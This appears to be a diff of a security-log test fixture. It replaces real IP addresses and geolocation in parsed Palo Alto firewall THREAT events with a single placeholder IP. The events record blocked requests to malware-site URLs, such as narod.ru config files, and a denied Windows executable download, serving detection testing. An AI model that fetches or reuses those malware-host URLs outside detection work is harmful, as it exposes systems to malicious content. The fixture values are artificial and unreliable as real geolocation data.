@@ -8655,14 +8637,14 @@ ], "ip": [ "192.168.0.2", - "213.180.199.61", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545765987Z", - "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:39,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,\"boialex.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "ingested": "2021-12-09T13:42:59.079356600Z", + "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,\"boialex.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -8685,23 +8667,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Russia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Russian Federation", + "region_name": "Jilin", "location": { - "lon": 37.6068, - "lat": 55.7386 - }, - "country_iso_code": "RU" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 13238, + "number": 4837, "organization": { - "name": "YANDEX LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "213.180.199.61" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -8717,7 +8701,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,\"edw-melon.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,\"edw-melon.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "panw": { "panos": { "ruleset": "rule1", @@ -8758,7 +8742,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:1211QM61Juawz4PBXLQBL9Q2FNA=", + "community_id": "1:DHVwop+oDb6b+fXFJcQe+63vKqI=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -8794,14 +8778,14 @@ ], "ip": [ "192.168.0.2", - "213.180.199.61", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545773156Z", - "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:42,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,\"edw-melon.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "ingested": "2021-12-09T13:42:59.079362800Z", + "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:42,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,\"edw-melon.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -8824,23 +8808,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Russia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Russian Federation", + "region_name": "Jilin", "location": { - "lon": 37.6068, - "lat": 55.7386 - }, - "country_iso_code": "RU" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 13238, + "number": 4837, "organization": { - "name": "YANDEX LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "213.180.199.61" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -8856,7 +8842,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,\"maximtushin.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,\"maximtushin.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "panw": { "panos": { "ruleset": "rule1", @@ -8897,7 +8883,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:MQfJlERz16LAn6Hn1YhCNKLOjjA=", + "community_id": "1:aNSYU1I4qtaV4fuGe9HTFru7eDc=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -8933,14 +8919,14 @@ ], "ip": [ "192.168.0.2", - "213.180.199.61", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545780437Z", - "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:51,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,\"maximtushin.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "ingested": "2021-12-09T13:42:59.079368600Z", + "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,\"maximtushin.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -8977,28 +8963,27 @@
 "source": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Brea",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "California",
+ "region_name": "Jilin",
 "location": {
- "lon": -117.8854,
- "lat": 33.9339
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 26347,
+ "number": 4837,
 "organization": {
- "name": "New Dream Network, LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "173.236.179.57"
+ "ip": "175.16.199.1"
 },
- "message": "173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -9039,7 +9024,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:to6WA2KM9vqO74DfMPJ8+v0cKPs=",
+ "community_id": "1:dd+2RtCBMUfATx7W9zSc0ZBYnK0=",
 "transport": "tcp",
 "application": "web-browsing",
 "direction": "outbound"
@@ -9074,15 +9059,15 @@
 "crusher"
 ],
 "ip": [
- "173.236.179.57",
+ "175.16.199.1",
 "192.168.0.2",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-08T12:37:05.545787385Z",
- "original": "Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "ingested": "2021-12-09T13:42:59.079374300Z",
+ "original": "Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "created": "2013-03-25T23:59:17.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -9105,26 +9090,25 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-FL",
- "city_name": "Fort Lauderdale",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Florida",
+ "region_name": "Jilin",
 "location": {
- "lon": -80.1749,
- "lat": 26.1792
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 27357,
+ "number": 4837,
 "organization": {
- "name": "Rackspace Hosting"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "204.232.231.46"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "rule1"
@@ -9140,7 +9124,7 @@
 },
 "ip": "192.168.0.2"
 },
- "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,\"marketingsoluchion.biz/fkn/config.bin\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,\"marketingsoluchion.biz/fkn/config.bin\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -9181,7 +9165,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:uO6RhHsqSUg1LHv5h+n+FE4cqrE=",
+ "community_id": "1:2rgAHkgQA6DrgtjSmjlvvertGQQ=",
 "transport": "tcp",
 "application": "web-browsing",
 "direction": "inbound"
@@ -9217,14 +9201,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "204.232.231.46",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:37:05.545794428Z",
- "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,\"marketingsoluchion.biz/fkn/config.bin\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+ "ingested": "2021-12-09T13:42:59.079396400Z",
+ "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,\"marketingsoluchion.biz/fkn/config.bin\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
 "created": "2013-03-25T23:59:22.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -9248,25 +9232,24 @@
 "nat": {},
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "HK-HCW",
- "city_name": "Central",
- "country_iso_code": "HK",
- "country_name": "Hong Kong",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Central and Western District",
+ "region_name": "Jilin",
 "location": {
- "lon": 114.15,
- "lat": 22.2909
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 8075,
+ "number": 4837,
 "organization": {
- "name": "Microsoft Corporation"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "207.46.140.46"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "rule1"
@@ -9282,7 +9265,7 @@
 },
 "ip": "192.168.0.6"
 },
- "message": "192.168.0.6,207.46.140.46,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,\"default.aspx\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+ "message": "192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,\"default.aspx\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -9323,7 +9306,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:KC3xpBK9CdouZqamG9S6Mjl6LIo=",
+ "community_id": "1:6aQBn5QchBNL0ZBo/IVt9BBsYB0=",
 "transport": "tcp",
 "application": "web-browsing",
 "direction": "inbound"
@@ -9359,14 +9342,14 @@
 ],
 "ip": [
 "192.168.0.6",
- "207.46.140.46",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:37:05.545801479Z",
- "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:27,192.168.0.6,207.46.140.46,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,\"default.aspx\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+ "ingested": "2021-12-09T13:42:59.079402200Z",
+ "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:27,192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,\"default.aspx\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
 "created": "2013-03-25T23:59:32.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -9403,28 +9386,27 @@
 "source": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-WA",
- "city_name": "Redmond",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Washington",
+ "region_name": "Jilin",
 "location": {
- "lon": -122.1257,
- "lat": 47.6722
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 8075,
+ "number": 4837,
 "organization": {
- "name": "Microsoft Corporation"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "65.54.161.34"
+ "ip": "175.16.199.1"
 },
- "message": "65.54.161.34,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,\"sck.aspx\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "message": "175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,\"sck.aspx\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -9465,7 +9447,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:qtNTXnMjHLAldLWQ5/jdyuCV6Yk=",
+ "community_id": "1:5SoLZizmsszANiI7xjGLSw7GJbQ=",
 "transport": "tcp",
 "application": "web-browsing",
 "direction": "outbound"
@@ -9500,15 +9482,15 @@
 "jordy"
 ],
 "ip": [
- "65.54.161.34",
+ "175.16.199.1",
 "192.168.0.6",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:37:05.545808736Z",
- "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,65.54.161.34,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,\"sck.aspx\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "ingested": "2021-12-09T13:42:59.079407900Z",
+ "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,\"sck.aspx\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "created": "2013-03-25T23:59:32.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -9545,28 +9527,27 @@
 "source": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-WA",
- "city_name": "Redmond",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Washington",
+ "region_name": "Jilin",
 "location": {
- "lon": -122.1257,
- "lat": 47.6722
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 8075,
+ "number": 4837,
 "organization": {
- "name": "Microsoft Corporation"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "65.55.5.231"
+ "ip": "175.16.199.1"
 },
- "message": "65.55.5.231,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,\"ADSAdClient31.dll\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "message": "175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,\"ADSAdClient31.dll\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -9607,7 +9588,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:OSQCnxYE2CqKztyfnzJHya/llPw=",
+ "community_id": "1:YwIjUf5XmZ40QrFQbjqLanySfdw=",
 "transport": "tcp",
 "application": "web-browsing",
 "direction": "outbound"
@@ -9642,15 +9623,15 @@
 "jordy"
 ],
 "ip": [
- "65.55.5.231",
+ "175.16.199.1",
 "192.168.0.6",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:37:05.545815973Z",
- "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,65.55.5.231,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,\"ADSAdClient31.dll\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "ingested": "2021-12-09T13:42:59.079413500Z",
+ "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,\"ADSAdClient31.dll\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "created": "2013-03-25T23:59:32.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -9673,26 +9654,25 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Los Angeles",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "California",
+ "region_name": "Jilin",
 "location": {
- "lon": -118.244,
- "lat": 34.0544
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 8075,
+ "number": 4837,
 "organization": {
- "name": "Microsoft Corporation"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "65.54.71.11"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "rule1"
@@ -9708,7 +9688,7 @@
 },
 "ip": "192.168.0.6"
 },
- "message": "192.168.0.6,65.54.71.11,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,\"c.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+ "message": "192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,\"c.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -9749,7 +9729,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:MeB0cefg5kMN7f+LW+cirwH2nA8=",
+ "community_id": "1:XYAoUgct4Qp84w3QO5r+XC/xzUE=",
 "transport": "tcp",
 "application": "web-browsing",
 "direction": "inbound"
@@ -9785,14 +9765,14 @@
 ],
 "ip": [
 "192.168.0.6",
- "65.54.71.11",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:37:05.545823298Z",
- "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:33,192.168.0.6,65.54.71.11,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,\"c.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+ "ingested": "2021-12-09T13:42:59.079419400Z",
+ "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:33,192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,\"c.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
 "created": "2013-03-25T23:59:32.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -9829,25 +9809,27 @@
 "source": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "74.125.239.17"
+ "ip": "175.16.199.1"
 },
- "message": "74.125.239.17,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "message": "175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -9888,7 +9870,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:iDmf9CnG+CdUuHWmwVsmhee3/Qs=",
+ "community_id": "1:G3mrQpxPg+ppF9n+9Uc40LS+KX0=",
 "transport": "tcp",
 "application": "web-browsing",
 "direction": "outbound"
@@ -9923,15 +9905,15 @@
 "jordy"
 ],
 "ip": [
- "74.125.239.17",
+ "175.16.199.1",
 "192.168.0.6",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:37:05.545830460Z",
- "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,74.125.239.17,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "ingested": "2021-12-09T13:42:59.079425200Z",
